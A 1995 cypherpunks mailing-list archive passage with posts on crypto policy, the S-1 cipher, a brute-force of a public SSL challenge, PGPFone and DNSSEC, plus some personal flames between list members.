iQBFAwUBMCr8YioZzwIn1bdtAQH+qQF/bA4povjtixKhIxak+M7aCYmbdMjj9U3r
azryqeapO4A2vYc4qEnP1zLmp83ceMUV
=W9y9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 18:15:12 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508110115.DAA17165@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Brad Shantz writes:
 > >I'm tired of Perry. 
 > 
 > <REST DELETED>
 > 
 > I think that any Perry bashing can be taken offline.  I don't think that 700
 > people subscribed to the "I Hate Perry Metzger" list;

Nah, that list is way bigger than cypherpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 11 Aug 95 00:16:38 PDT
To: "L. McCarthy" <lmccarth@cs.umass.edu>
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <9508110100.AA10650@cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950811031534.10223A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, L. McCarthy wrote:

> Date: Thu, 10 Aug 1995 21:00:39 -0400 (EDT)
> From: L. McCarthy <lmccarth@cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
> 
> Well, for the record, _I_ certainly appreciate .pm's efforts on many fronts
> related to cypherpunks.

As do I.

Certainly he bridges the suit/anarchist gap better than anyone else on 
the list I can think of for the moment.


> 
> Anonymous rants:
> > I know you personally Perry, 
> 
> I doubt it. Prove it to me in *private* email.
> 
> -L. "Futplex" McCarthy   [PGP key available via finger or server]
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 11 Aug 95 00:19:25 PDT
To: perry@piermont.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508110337.XAA15986@panix2.panix.com>
Message-ID: <Pine.SUN.3.91.950811031803.10223B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> Date: Thu, 10 Aug 1995 23:37:48 -0400
> From: Perry E. Metzger <perry@panix.com>
> To: cypherpunks@toad.com
> Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME 
> 
> 
> Anonymous writes:
> > I'm tired of Perry. he's always ranting and stirring the shit.
> 
> I was under the impression Detweiler was legally obligated not to post
> to this mailing list.

Of course it's hard to substantiate who he is when he becomes a tenticle 
himself.

Ah the lovely justice irony serves up like a cold platter of salmon.


> 
> .pm
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 19:45:08 PDT
To: cypherpunks@toad.com
Subject: UHS encoding
Message-ID: <199508110245.EAA17947@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


has anyone heard of UHS ? ? its universal hint system . . its for game hints
. . its data files are encrypted and a decoder decodes only the hints you
need . . anyone know what encryption is used ? ? its probably very weak but
a good idea . . i wonder if this is export - restricted too ! !





















--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Thu, 10 Aug 95 20:02:12 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sgkM8-0002AfC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


I think we ought to just throw TIM MAY out of the list. 
let's EXCOMMUNICATE HIM. its becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. this is ERIC HUGHES'
mailing list, and eric hughes knows how to write some
decent code. I mean, TCM's signature doesn't even have any
geek code, and he hasn't changed it in 4 years or so,
at least since my last grandparent died (and she was 
considerably more skillful at programming than TCM by
knowing how to make toast).

get rid of all the pricks who continually spout and spew conspiracy
theories. let TCM go and find himself a new mailing list.
that would be a fair comeuppance if he found that he couldn't
learn to do squish because he doesn't have the slightest
clue. he's a leech, a parasite, sucking on the work of
others, pretending that he is at the forefront of our
cause when he is only at the forefront of maniacal egomania.
what has he contributed to the cause? SQUAT. just a lot
of ranting about conspiracy theories and his Stock Pick
of the Week crap. "the web is really growing. people should
focus on it". well, THANK YOU VERY MUCH, MR. BRILLIANT
COMMENTATOR AND VISIONARY, T.C.MAY, I would have never
have THOUGHT of that in a zillion years, but now that you
point it out, I GUESS YOU'RE RIGHT.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 11 Aug 95 02:38:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Australia, EU crypto ill news, crypto wars
In-Reply-To: <8500.9508110844@exe.dcs.exeter.ac.uk>
Message-ID: <199508110938.FAA07114@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ross Anderson wrote somewhere:
> While at the conference, I found out that a classified meeting
> took place this March in Germany between the signals intelligence
> agencies of the developed countries, plus Australia and South Africa,

Does this imply that neither Australia nor SA has a sigint agency, or that
neither Australia nor SA is a developed country ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 11 Aug 95 03:07:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Protect the children" as passphrase to Constitution
In-Reply-To: <199508110813.BAA25692@ix9.ix.netcom.com>
Message-ID: <199508111006.GAA12092@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> Clinton's Executive Order today which limits advertising of cigarettes,
[...]
> (Oh, and one amazing detail: the possible issuance of I.D. cards to all of
> those under the age of 18. Besides being useful for things like curfews,

Can someone offer a citation for this ?

I've tried to find the text of the Executive Order on the net, to no avail. 
http://docs.whitehouse.gov/white-house-publications/1995/08/ has a couple of
short fact sheets on the proposal, and transcripts of a briefing by Sec.
Shalala (DoHHS) and Dir. Kessler (FDA), Clinton's press conference, and his
opening remarks at some discussion with teens about smoking.

I couldn't find anything relevant at http://www.fda.gov/

There's an article in the LA Times (Richter/Cimons) which says:
	The landmark proposal, which could open the door to further curbs
	on tobacco, is expected to include prohibiting cigarettes sales
	to those 18 or younger, enforced by requiring proof of age with
	photo identification.
This sounds to me like a similar approach to the alcohol access protocol.

-Futplex             "Why should I solidify ?" -Sheryl Crow



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Fri, 11 Aug 95 05:57:13 PDT
To: cypherpunks@toad.com
Subject: Re: SSL bruting progress
In-Reply-To: <8377.9508110806@exe.dcs.exeter.ac.uk>
Message-ID: <199508111257.GAA01780@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> We've not managed to isolate the cause of it, as (two people) have
> nearly swept the entire keyspace (heh they had a bit of spare compute)
> and no key has been forthcoming so far.

Um, if you're going to sweep the whole space yourself before you release
the code, what's the point in a public sweep? 

                                    -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 04:35:03 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508110353.UAA04743@jobe.shell.portal.com>
Message-ID: <199508111143.HAA23820@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>The other thing I noticed that really makes me question this is that G1
>only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
>parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
>imagine why it would do this intentionally.  G1 may not be that important
>an element of the cipher but why throw away four bits?
>
>It is possible I suppose that the F and G boxes are not the ones used
>in the "real" version of whatever cipher this is, so this apparent
>weakness and the ones which Matt has pointed out may not be that
>significant.

While I'm loath to make any statement that could be interpreted as
defending this cipher, these are, as you say, only "apparent"
weaknesses.  Other than the "r vs. i" bug, which a very forgiving
observer might attribute to some kind of error (maybe the code was
typed in from a printout; maybe the program was taken from a "working
copy" in the middle of being modified), so far, no one has demonstrated
conclusively that these unorthodox and seemingly unsound design
characteristics actually help the cryptanalyst in this particular
cipher.  I'm talking out of my hat here, but for all we know
carefully selected non-uniformly distributed s-boxes and key
schedules that throw out the odd bit here and there in just the
right way might thwart some killer cryptanalytic technique that
isn't yet known in the civilian world.  Hardly likely, but still
remotely possible.

We can't completely rule this out unless we've seen that the cipher
falls to the various known meta-attacks, like differential and
linear cryptanalysis.  I don't really think this is worth the
trouble, however, given that these techniques can require considerable
effort and skill to apply to an arbitrary cipher and that everything
else about this thing points to a hoax designed to provoke just
such a waste of time.

(Someone will no doubt make me eat my words by doing a rump session
talk at CRYPTO on how interesting the linear and differential
analysis of this cipher turned out to be.)

-matt

PS to whoever posted this thing, if you're reading this: If this
cipher isn't what its comments assert, and you've just added spooky
labels to get people interested in evaluating some design technique
that you've invented because you think no one will take you seriously
if you just come clean, you're wrong.  An intellegently-written
description of your ideas, coupled with an easily-evaluated example,
can get a lot of attention from the crypto community no matter what
the source.  I've personally looked at several such schemes, and
had at one of my own (MacGuffin, which you're obviously familar
with) widely examined by doing just that.  You could have produced
such a description with about as much effort as you've obviously
already gone to in creating the "S-1" code, with far greater
potential rewards.  And if this is just a random hoax, well, I
guess it looks like you've suceeded.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 08:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <ac50c91b000210048e9d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:36 PM 8/11/95, Ray Cromwell wrote:

>  My question is, how portable is it, and does it work over TCP/IP rather
>than just modem connections (I suggested this about a year ago)? My ideal
>implementation would function on the following architectures:
>
>Unix: can be used through either /dev/tty?? or Socket (probably want
>to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
>(audio devices are all proprietary)
>
>
>Windows: uses Window's sound card device drivers, works via either
>comport or WinSock
>
>Mac: uses Mac sound drivers, uses Mac modem port or MacTCP

From the "MacWeek" article, it initially runs on the Macintosh, using the
sound capabilities built into (nearly) all Macs. Direct modem connections,
with Internet versions to follow. (Windows to follow, too.)

Sound quality with 9600 baud modems said to be pretty good, quality with
14.4 modems said to be very good, and quality with 28.8 modems said to be
better than standard phone quality.

The Mac may be a strange platform to develop on, to many of you, but it has
some advantages. The sound tools are relatively standardized and are even
built into the OS. Developers can thus count on what users will have.

But why the developers actually picked the Mac to do first is something
they can talk about.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 01:09:25 PDT
To: admin@dcwill.com
Subject: SSL bruting progress (was: Crypto-relevant flame interruption)
Message-ID: <8377.9508110806@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred <admin@dcwill.com> wrote on cpunks:
> Would someone be so kind as to provide a status report on the
> planned SSL attack? Last word was that codework was still underway,
> but I might have missed something relevant to this project amidst
> all of the noise about excessive list noise.

There has been no public announce.  This is due to a desire to make
real sure it's going to work before announcing.

So, we're working on it.  Software is basically all there, but we're
experiencing difficulties, like during a trial run no key for Hal's
challenge seems to be being found, even though the same software finds
test keys.

We've not managed to isolate the cause of it, as (two people) have
nearly swept the entire keyspace (heh they had a bit of spare compute)
and no key has been forthcoming so far.  Give it a few more days -
until monday - and if no key is found we've got problems, 3 possible
outcomes looming:

a) we find the key to Hal's challenge and go whoopee!  Request a 2nd
   challenge from Hal? and announce a public sweep to see how fast it
   can be done.

b) something is wrong with the interpretation or the gathering of the
   SSL session data Hal based his challenge on (difficult to see
   as there are numerous fixed fields which tally with the SSL spec.)

c) software problems (also difficult to see, the software
   in all cases (3 separate versions) finds the keys of examples
   provided by Andrew Roos (ie he generated a key manually, so we know
   where to start for testing purposes)).

The likelihood of a) happening is receding, as the last key space gets
ticked off.

More news next week.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 11 Aug 95 06:21:44 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Clinton to resign?
In-Reply-To: <Pine.SOL.3.91.950811012207.19227A-100000@use.usit.net>
Message-ID: <199508111321.JAA28584@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't even see the word "cipher" or "code" in this message, let
alone "NSA" or anything else. Perhaps you misdirected this here when
you intended to mail it to "conspirapunks"?

(More seriously, I really resent having wasted another precious minute
of my life reading this. Please don't do that again. I can't even find
the most tenuous relevance to the list.)

Brad Dolan writes:
> 
> Associated Press reported on August 10, 1995:
>  
> President Won't Resign But...
> 
> (WASHINGTON)
> 
> President Clinton wasn't about to give a serious 
> answer when he was asked Thursday if he might resign. 
> 
> The question came from veteran columnist Sarah McClendon, who asserted 
> that some legislators from the left and right were trying to push him 
> out of office.
> 
> [...]
> 
> "Well, if you promise to run off with me I might," Clinton responded,
> ... "But otherwise, I can't think of any reason." 
> 
> - - - - - - - - - -
> 
> Repeat after me:
> 
> There's nothing to those crazy conspiracy theories.
> There's nothing to those crazy conspiracy theories.....
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 11 Aug 95 06:28:04 PDT
To: Nesta Stubbs <nesta@wwa.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSD.3.91.950811001051.1066E-100000@miso.wwa.com>
Message-ID: <199508111327.JAA01106@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Nesta Stubbs writes:
> There are some other problems too I believe.  I have worked for a decent 
> sized network who did all user authentication at the terminal servers for 
> dial-in accounts thru DNS.  This wasn't too bad for just passws and 
> stuff, but wouldn't this cause some bloat in the nameservers database?  

HESIOD is an excellent demonstration that it works just fine.

> As well as cause problems security wise when it comes to updates.  Would 
> these automatically not be cached in any form by the site making the 
> request?  This also causes a problem for smaller time people who perhaps 
> have a PPP/SLIP connection 24/7 but have nameserve done by their prvider, 
> and I for sure don't want my provider to be in control of those keys. 

Why not? After all, they are signed. You can have them held by your
worst enemy and it should be just fine. Thats the idea of public key
signatures.


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 11 Aug 95 06:33:20 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508102043.QAA17280@crypto.com>
Message-ID: <9508111333.AA05740@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
> 
> Yesterday I mentioned that I'd noticed that "S-1" has a non-uniform
> distribution of F (Sbox?) outputs - some values appear far more often
> than others.  This means that some values are more likely to be XORed
> against the cleartext than others.  Needless to say, this is a very
> unusual (and presumably very bad) property - in DES, for example, the
> Sbox outputs are completely flat.

If it is Skipjack, that would sure explain why they didn't want to
release the source code, eh?  Maybe there was more than one "back door".


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 06:36:46 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111336.JAA05910@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
> ("Vladimir Z. Nuri") wrote:
> 
> >as if PRZ is not already enough of a folk hero....
> >BTW, he has been beat by Nautilus, right? Nautilus
> >is public domain, right? (I'm thinking of that public
> >domain voice encryption released a few mos ago).
> >I wonder if he is going to try to put a "spin" on this
> >one to differentiate it from the other one. on the 
> >other hand, just having his name on it is plenty of
> >"spin"...
> 
> I can't violate my NDA, but PGPFone will be a *major* revolution for
> communication security. I would not be surprised to see several hundred
> thousands of users. PGP will plale in comparison.

  My question is, how portable is it, and does it work over TCP/IP rather
than just modem connections (I suggested this about a year ago)? My ideal
implementation would function on the following architectures:

Unix: can be used through either /dev/tty?? or Socket (probably want
to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
(audio devices are all proprietary)


Windows: uses Window's sound card device drivers, works via either 
comport or WinSock 

Mac: uses Mac sound drivers, uses Mac modem port or MacTCP

I'm looking for someting that has the look and feel of Internet Phone
(but ported to multiple platforms) with encryption.

-Ray

  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 09:37:28 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d00ac513fd2f9bc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:36 8/11/95, Ray Cromwell wrote:

>  My question is, how portable is it, and does it work over TCP/IP rather
>than just modem connections (I suggested this about a year ago)? My ideal
>implementation would function on the following architectures:

I can't comment on the features of PGPFone. However, know that Internet
telephony (as all "real time" services) work overe UDP only, not TCP.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 01:45:05 PDT
To: cypherpunks@toad.com
Subject: Australia, EU crypto ill news, crypto wars
Message-ID: <8500.9508110844@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Just read this on comp.risks, by Ross Anderson (via a couple of people).

A crypto relevant forward if any is relavent IMO, especially this bit:

Ross Anderson <rja14@cl.cam.ac.uk> writes:
> ... While at the conference, I found out that a classified meeting
> took place this March in Germany between the signals intelligence
> agencies of the developed countries, plus Australia and South Africa,
> at which the assembled spooks agreed to press their governments to
> bring in escrow and/or weak crypto.

You realise, of course, that this means war,

Tatical replies?

a) Lobbying - hopeless IMO, they aren't interested in listening, the
   politicos are just too easy to manipulate and the "masses" aren't
   clueful enough of what crypto means to understand the implications,
   or even notice.

b) pretty good stego - possible technical solution

c) independant states of cyberspace :-)  declaration of independence


c) enforced or "enabled" by b) looks good to me.

Perhaps some literary skilled cpunk would care to compose a suitable
reply for PGN to add to risks.

Adam

----------------------------------------------------------------------
Date: Tue, 1 Aug 1995 20:36:29 -0400 (EDT)
From: "Lance J. Hoffman" <hoffman@seas.gwu.edu>
Subject: Australia next to ban PGP

Date: Tue, 01 Aug 1995 15:29:05 -0400
From: Dave Farber <farber@cis.upenn.edu>
Subject: Australia next to ban PGP [unverified info ...]

From: rja14@cl.cam.ac.uk (Ross Anderson)

Australia's proposed crypto policy:

(1)	Banks will get key escrow
(2)	Other Australian residents will be forced to use weak crypto

Source: talk by Steve Orlowski, Assistant Director, Australian attorney 
general's department, given at the Cryptography Policy and Algorithms 
Conference, Queensland University of Technology, last month.

p 34: `the needs of the majority of users of the infrastructure for
      privacy and smaller financial transactions can be met by lower 
      level encryption which could withstand a normal but not 
      sophisticated attack against it. Law enforcement agencies could 
      develop the capability to mount such sophisticated attacks. 
      Criminals who purchased the higher level encryption products 
      would immediately attract attention to themselves.'

He mentioned that his department considered itself a suitable repository
for the government central decrypting unit, which would decrypt traffic 
for local police forces. He also wants to escrowed keys for banks and 
other organisations allowed to use strong crypto. 

Centralising the wiretap capability with the AG is represented as a useful
safeguard against abuse of power by local police forces. It would be
presented as a `data recovery' facility in order to reassure the voters.

Centralisation will enable the AG to acquire the capability to use ``more 
sophisticated techniques in circumstances where the key cannot, for 
whatever reason, be recovered from escrow''.

So the technical parameters would appear to be: 40 bit keys for the 
masses, 56-bit escrowed keys for the banks, and a Wiener machine sitting
in Orlowski's office. Belt, braces and string.

Curiously enough, he quotes a `Review of long Term Cost Effectiveness
of Telecommunications Interception' as saying that ``Encryption by 
targets of their communications (both voice and data) is not considered
as a problem for TI at present in Australia'' and goes on to say that
``there has been comparatively little market for voice encryption 
products, although they have been readily available''. 

He even produces some good arguments for the EFF, such as that much of
the intelligence comes from the call log data and from calls to third 
parties such as airlines and hotels which are not encrypted.

He also says that the OECD countries will hold a meeting on National 
Cryptography Policies later this year. While at the conference, I found
out that a classified meeting took place this March in Germany between 
the signals intelligence agencies of the developed countries, plus
Australia and South Africa, at which the assembled spooks agreed to
press their governments to bring in escrow and/or weak crypto.

Australia seems rather eager to lick Uncle Sam's boots on this issue. 
I wonder what the payoff was?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 11 Aug 95 06:51:35 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <9508111351.AA04381@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Eastlake has actually done a draft RFC on
using the DNS for key distribution.

It may be found at 

ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt

He briefed the W3C security working group about
this recently, and a number of people raised objections, notably

* database bloat
* zone transfer bloat
* increased hits on root servers due to a new class of inquiry.

There was some discussion as to whether these were valid objections,
and the people running prototype code said they had had no problems.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Aug 95 07:01:59 PDT
To: cypherpunks@toad.com
Subject: Re: \"S1\" encryption system
Message-ID: <199508111401.KAA07834@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Is it possible that there are multiple levels of encryption
   included in the "S1" algorithm?

   This question is prompted by reviewing the DoD's Multilevel
   Security (MLS) Program at:

      http://www.disa.mil/MLS/mls_home.html

   One of the features of this program is to design means to
   simultaneously transmit data with different levels of
   security, so that communicants send and/or read the data
   according to their levels of security clearance. This is
   amplified in Section 3 of the program description at:

      http://www.disa.mil/MLS/info/basics/sec3.html#2

   Excerpts:

      Multilevel security allows information systems to
      provide capabilities that augment its existing
      single-level data processing and data communications
      services. Data of multiple security levels are  
      processed and transferred by the system, which also
      separates the different security levels and controls
      access to the data. ...

      When a system operates in the multilevel mode, it allows
      data of two or more security levels to be processed
      simultaneously when not all users have the clearance,
      formal authorization, or need to know for all data
      handled by the system. The system is able to separate
      and protect the data according to these restrictions.
   
      To amplify the definition, an MLS system might process
      both Secret and Top Secret collateral data and have some
      users whose maximum clearance is Secret and others whose
      maximum clearance is Top Secret. Another MLS system
      might have all its users cleared at the Top Secret
      level, but have the ability to release information
      classified as Secret to a network consisting of only
      Secret users and systems. Still another system might
      process both Secret and Unclassified information and
      have some users with no clearance. In each of these
      instances, the system must implement mechanisms to
      provide assurance that the system's security policy is
      strictly enforced. In these examples, the policy  
      allows access to the data by only those users who are
      appropriately cleared and authorized (e.g., having
      formal access approval) and who have an official need to
      know for the data.
   
      A related mode of operation is the partitioned mode,
      also known as compartmented mode. Although similar
      concepts and solutions are involved for compartmented
      mode operations as are for the multilevel mode, there is
      also a key difference. In the compartmented mode, all
      users have clearances for all the data processed but may
      not have authorizations for all the data; whereas for
      multilevel mode, some users may not even be cleared for
      the highest level. Because the compartmented mode is
      often envisioned for the intelligence community, all
      such users would have Top Secret security clearances and
      often authorizations for one or more, but possibly not
      all, compartments in the system.

   End excerpts.

   There are also descriptions of the soft and hardware
   implementations of MLS.

   Would anyone care to comment on how this differentiation of
   levels of security is done, by a single encryption program
   or multiples, and if multiples, their arrangement? Is
   feature then embedded in the hardware, such as the Fortezza
   card system cited in the program?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Aug 95 11:01:51 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111759.KAA05515@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I can't violate my NDA, but PGPFone will be a *major* revolution for
>communication security. I would not be surprised to see several hundred
>thousands of users. PGP will plale in comparison.

I sincerely doubt this. if someone could find a way of doing 
voice encryption through simple idiotproof hardware adapters
(I am thinking of cups that you could attach to any standard phone)
the voice encryption will not be widely used, I think.
there are very many PGP users right now, say at least in the
tens of thousands if not hundreds of thousands. the 
requirements for live voice encryption are pretty significant:
a fast computer and fast modem. this alone is only a subset
of those people using PGP right now. also, I doubt there are
going to be few people who use PGP phone but not PGP software.

the real holy grail for voice communication encryption is
when this stuff starts to get integrated into the real 
phone system, or people start making hardware that is
cheap and self contained and idiot proof. "but it's difficult
to make anything foolproof, because fools are so ingenious" <g>

the actual phone networks, because of political pressure, 
certainly are probably going to be the last entities on 
earth to use hardware that makes encryption built in.
(well, assuming they don't get all that cash from the 
government to built in key escrow). 

what I think would be cool, and I'm sure everyone here would
agree, is a "back door" way to encryption. one example:
it used to be that slip providers were charging a lot of
money. then the authors of TIA (Internet Adaptor) discovered
they could simulate SLIP over a unix shell account without
a significant performance penalty (i.e. it was possible).
voila!! slip for everyone, *regardless* of what the provider
wants or tries to manage. then, someone did this for
*free* in public domain SLiRP software.

this is an extremely useful model: "big fish provider" gives
a capability that people want, namely processing time and
disk space. they think they can regulate the uses of their
system, but if there is enough degrees of freedom, they 
cannot, and people can actually simulate the services they
want on the system regardless of what the system operators
wish to control or not control.

with the phone system, the analogy is that the communication
networks are providing bandwidth, and while they would like
to control things like voice vs. data vs. encryption, they
*cannot* if their capabilities are suitably diverse (and
it is virtually impossible for them *not* to be).

when someone invents cheap hardware that you can just plug
on top of any existing phone, i.e. "the phone adaptor", TPA?,
*that's* when the world is going to go crazy with crypto.
all this stuff that requires lots of hardware can be used,
but the thing that will cause *everyone* to use it is when
someone invents a TPA. I'm very, very surprised that no 
one has tried to do this yet.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 11 Aug 95 11:25:39 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d06ac515d75289e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Of course, if it was a substantial improvement over the
other "Internet Phone" stuff that's out there, and had
a good way of dealing with switching, etc., then people
would use it to make "free" l.d. phone calls on the net,
and the cryptography would get a free ride.

Generally, you are right in suggesting that anything that
requires people to crawl behind their computers, attach
new cables, purchase and debug a sound card under Windows,
and generally engage in techno-weenie hardware manipulations
will have less appeal than something plug and play. Even
given the extremely user-hostile elements of PGP the software,
I would be surprised if PGPFone became as popular.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Fri, 11 Aug 95 10:00:16 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111655.LAA03909@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
> ("Vladimir Z. Nuri") wrote:
> 
> >as if PRZ is not already enough of a folk hero....
> >BTW, he has been beat by Nautilus, right? Nautilus
> >is public domain, right? (I'm thinking of that public
> >domain voice encryption released a few mos ago).
> >I wonder if he is going to try to put a "spin" on this
> >one to differentiate it from the other one. on the
> >other hand, just having his name on it is plenty of
> >"spin"...
> 
> I can't violate my NDA, but PGPFone will be a *major* revolution for
> communication security. I would not be surprised to see several hundred
> thousands of users. PGP will plale in comparison.
> 
> --
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]

This doesn't fall into line with the "mainstream" of personal computing, of
